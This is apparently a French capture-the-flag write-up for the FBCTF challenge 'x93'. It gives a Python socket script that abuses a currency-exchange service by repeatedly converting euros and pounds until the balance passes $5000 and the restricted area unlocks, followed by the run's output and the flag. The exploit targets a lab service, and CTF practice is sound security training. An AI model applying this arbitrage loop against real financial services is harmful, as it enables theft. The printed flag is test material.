===== x93 (350) =====
i wanna access the restricted area
95.170.83.28:3003
==== Overview ====
On se connecte à un service où il est possible de faire des échanges de monnaie (d'une monnaie à une autre).
Qui dit échanges, dit taux.
Passer d'une monnaie à une autre puis faire le chemin inverse revient à perdre ou à gagner de l'argent !
Le but ici va être de récupérer $5000 à partir de $100, 100€ et 100£.
==== Solution ====
J'ai choisie de jouer avec les € et les £ pour ensuite convertir les € en $.
€ => £
£ => €
...
€ => $
import socket
def msg(data):
return data + "\n"
def parseamount(buffer):
splt = buffer.split(' , ')
usd = splt[0][17:-4]
eur = splt[1][:-4]
gbp = splt[2][:-9]
return (usd, eur, gbp)
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('95.170.83.28', 3003))
USD = 100
EUR = 100
GBP = 100
sock.recv(512) # welcome message
sock.recv(512) # wanna trade?
sock.send(msg('yes')) # YES!
sock.recv(512) # username?
sock.send(msg('Xartrick')) # here!
sock.recv(512) # Thanks!
while 1:
# GBP to EUR
sock.recv(512) # get menu
sock.send(msg('2')) # exchange
sock.recv(512) # destination?
sock.send(msg('EUR')) # EUR!
sock.recv(512) # source?
sock.send(msg('GBP')) # GBP!
sock.recv(512) # amount?
sock.send(msg(str(GBP))) # GBP value
buffer = sock.recv(512) # get current values
(USD, EUR, GBP) = parseamount(buffer)
print 'EUR =>', EUR
if float(EUR) > 5000.0:
break
# EUR to GBP
sock.recv(512) # get menu
sock.send(msg('2')) # exchange
sock.recv(512) # destination?
sock.send(msg('GBP')) # GBP!
sock.recv(512) # source?
sock.send(msg('EUR')) # EUR!
sock.recv(512) # amount?
sock.send(msg(str(EUR))) # EUR value
buffer = sock.recv(512) # get current values
(USD, EUR, GBP) = parseamount(buffer)
print 'GBP =>', GBP
# EUR to USD
sock.recv(512) # get menu
sock.send(msg('2')) # exchange
sock.recv(512) # destination?
sock.send(msg('USD')) # USD!
sock.recv(512) # source?
sock.send(msg('EUR')) # EUR!
sock.recv(512) # amount?
sock.send(msg(str(EUR))) # EUR value
buffer = sock.recv(512) # get current values
(USD, EUR, GBP) = parseamount(buffer)
print
print 'USD =>', USD
print
sock.recv(512) # get menu
sock.send(msg('4')) # restricted area
buffer = sock.recv(512)
print buffer
sock.close()
main()
C:\CTF\FBCTF\x93>script.py
EUR => 253.85
GBP => 218.31
EUR => 335.86
GBP => 288.84
EUR => 444.37
GBP => 382.16
EUR => 587.94
GBP => 505.63
EUR => 777.89
GBP => 668.99
EUR => 1029.22
GBP => 885.13
EUR => 1361.74
GBP => 1171.1
EUR => 1801.69
GBP => 1549.45
EUR => 2383.77
GBP => 2050.04
EUR => 3153.91
GBP => 2712.36
EUR => 4172.86
GBP => 3588.66
EUR => 5521.02
USD => 6062.7
FLAG{7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0}
==== Flag ====
7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0